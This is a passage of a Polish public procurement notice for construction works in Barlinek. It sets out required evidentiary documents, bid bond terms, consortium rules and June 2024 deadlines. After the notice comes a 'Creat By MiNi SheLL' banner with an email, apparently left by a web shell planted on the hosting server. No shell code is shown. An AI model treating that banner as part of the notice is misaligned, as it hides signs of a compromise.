dotyczących zawarcia z innymi wykonawcami <br/>porozumienia mającego na celu zakłócenie konkurencji,<br/>4) art. 108 ust. 1 pkt 6 PZP,<br/>5) art. 109 ust. 1 pkt 1 PZP, odnośnie do naruszenia obowiązków dotyczących <br/>płatności podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 <br/>stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2023 r. poz. 70),<br/>6) art. 109 ust. 1 pkt 8 i 10 PZP.<br/><br/>d) zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że <br/>wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 <br/>PZP, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w <br/>przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem <br/>zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed <br/>upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu <br/>albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych <br/>podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące <br/>porozumienie w sprawie spłat tych należności;<br/><br/>e) zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej <br/>Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub <br/>właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego <br/>potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia <br/>społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 PZP, wystawionego nie <br/>wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem <br/>składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo <br/>innym dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że <br/>przed upływem terminu składania ofert wykonawca dokonał płatności należnych <br/>składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami <br/>lub zawarł wiążące porozumienie w sprawie spłat tych należności;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunków udziału w postępowaniu, o których mowa w pkt <br/>8.1. Zamawiający przed udzieleniem zamówienia, działając na podstawie art. 274 ust. 1 PZP <br/>wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, <br/>nie krótszym niż 5 dni, terminie aktualnych na dzień złożenia następujących podmiotowych <br/>środków dowodowych:<br/><br/>a) informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej <br/>wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w <br/>okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem.<br/>Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć wymaganych przez <br/>Zamawiającego podmiotowych środków dowodowych, o których mowa w lit. a), <br/>Wykonawca składa inne podmiotowe środki dowodowe, które w wystarczający sposób <br/>potwierdzają spełnianie opisanego przez Zamawiającego warunku udziału w postępowaniu <br/>dotyczącego sytuacji ekonomicznej lub finansowej.<br/><br/>b) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a <br/>jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich <br/>rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały <br/>wykonane (wzór wykazu robót budowlanych stanowi załącznik nr 5 do SWZ);<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, <br/>wykonanych wspólnie z innymi wykonawcami wykaz dotyczy robót budowlanych, w <br/>których wykonaniu wykonawca ten bezpośrednio uczestniczył. <br/>5-cio letni okres liczy się wstecz od dnia w którym upływa termin składania ofert.<br/><br/>c) dowodów określających, czy wskazane przez Wykonawcę roboty budowlane na <br/>potwierdzenie spełnienia warunku udziału w postępowaniu dot. zdolności technicznej lub <br/>zawodowej w zakresie doświadczenia zostały wykonane należycie.<br/>Dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez <br/>podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z <br/>przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne <br/>odpowiednie dokumenty.<br/><br/>d) wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w <br/>szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z <br/>informacjami na temat ich kwalifikacji zawodowych, posiadanych uprawnień, <br/>doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu <br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi <br/>osobami (wzór wykazu osób skierowanych przez wykonawcę do realizacji zamówienia <br/>stanowi załącznik nr 6 do SWZ).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga od Wykonawców przedłożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga wniesienia wadium w wysokości 12.000 zł (słownie: dwanaście tysięcy <br/>złotych 00/100).<br/>Wadium należy wnieść przed upływem terminu składania ofert i utrzymywać nieprzerwanie <br/>do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 <br/>ust. 1 pkt 2 i 3 oraz ust. 2 PZP. <br/><br/>Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu,<br/>2) gwarancjach bankowych,<br/>3) gwarancjach ubezpieczeniowych,<br/>4) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 <br/>ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju <br/>Przedsiębiorczości (tekst jedn.: Dz. U. z 2020 r. poz. 299).<br/><br/>Pozostałe szczegóły dotyczące wadium zawiera rozdział 12 SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia <br/>(konsorcjum): <br/><br/>1) w formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie <br/>ubiegających się o udzielenie zamówienia;<br/><br/>2) oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców <br/>wspólnie ubiegających się o udzielenie zamówienia. Osoba podpisująca ofertę musi <br/>posiadać umocowanie prawne do reprezentacji. Umocowanie musi wynikać z treści <br/>pełnomocnictwa załączonego do oferty – treść pełnomocnictwa powinna dokładnie <br/>określać zakres umocowania;<br/><br/>3) oświadczenie, o którym mowa w art. 125 ust. 1 PZP tj. oświadczenie o spełnieniu <br/>warunków udziału w postępowaniu (wg wzoru stanowiącego załącznik nr 3 do SWZ) oraz <br/>o braku podstaw do wykluczenia (wg wzoru stanowiącego załącznik nr 2 do SWZ) składa <br/>każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te <br/>potwierdzają brak podstaw wykluczenia oraz spełnienie warunków udziału w <br/>postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków <br/>udziału w postępowaniu. Ww. oświadczenie wykonawców wspólnie ubiegających się o <br/>udzielenie zamówienia powinno zostać złożone wraz z ofertą pod rygorem nieważności, w <br/>formie elektronicznej (tj. opatrzonej kwalifikowanym podpisem elektronicznym) lub w <br/>postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym;<br/><br/>4) dokumenty, o których mowa w pkt 10.3. obowiązany będzie złożyć każdy z wykonawców <br/>wspólnie ubiegających się o udzielenie zamówienia;<br/><br/>5) dokumenty, o których mowa w pkt 10.2. lit. b i d wykonawcy wspólnie ubiegający się o <br/>zamówienie składają wspólnie, natomiast dokumenty, o których mowa w pkt 10.2. lit. a i c<br/>składa ten z wykonawców wspólnie ubiegających się o udzielenie zamówienia, który <br/>wykazuje spełnienie warunku udziału w postępowaniu, do którego wykazania służy dany <br/>dokument; <br/><br/>6) wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić <br/>odpowiedzialność solidarną za wykonanie umowy;<br/><br/>7) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie <br/>Wykonawcę kierującego (lidera), upoważnionego do zaciągania zobowiązań, <br/>otrzymywania poleceń oraz instrukcji dla i w imieniu każdego, jak też dla wszystkich <br/>partnerów;<br/><br/>8) Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w <br/>całości przez lidera lub od wszystkich Wykonawców wspólnie ubiegających się o <br/>udzielenie zamówienia łącznie lub każdego z osobna.<br/><br/>9) Zamawiający informuje o treści przepisu art. 117 ust. 3 PZP, zgodnie z którym w <br/>odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub <br/>doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą <br/>polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane, do <br/>realizacji których te zdolności są wymagane.<br/>W związku z powyższym Wykonawca jest zobowiązany załączyć do oferty <br/>podmiotowy środek dowodowy w postaci oświadczenia, z którego wynika, które <br/>roboty budowlane wykonają poszczególni Wykonawcy. Wzór stosownego <br/>oświadczenia został zawarty w formularzu ofertowym stanowiącym załącznik nr 1 i <br/>Zamawiający zaleca złożyć to oświadczenie właśnie w tym formularzu.<br/><br/>Szczegóły w zakresie wymagań dotyczących składania oferty przez wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia zawiera rozdział 10 SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy w sprawie zamówienia publicznego zawiera wzór <br/>umowy stanowiący załącznik nr 9 do SWZ.<br/><br/>Umowa zostanie zawarta na podstawie złożonej oferty Wykonawcy. Zamawiający przewiduje <br/>możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie <br/>której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z <br/>okoliczności w niej wymienionych z uwzględnieniem podanych we wzorze umowy warunków <br/>ich wprowadzenia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-06-26 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy złożyć za pośrednictwem Platformy Zakupowej https://platformazakupowa.pl/pn/barlinek</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-06-26 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-07-25</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com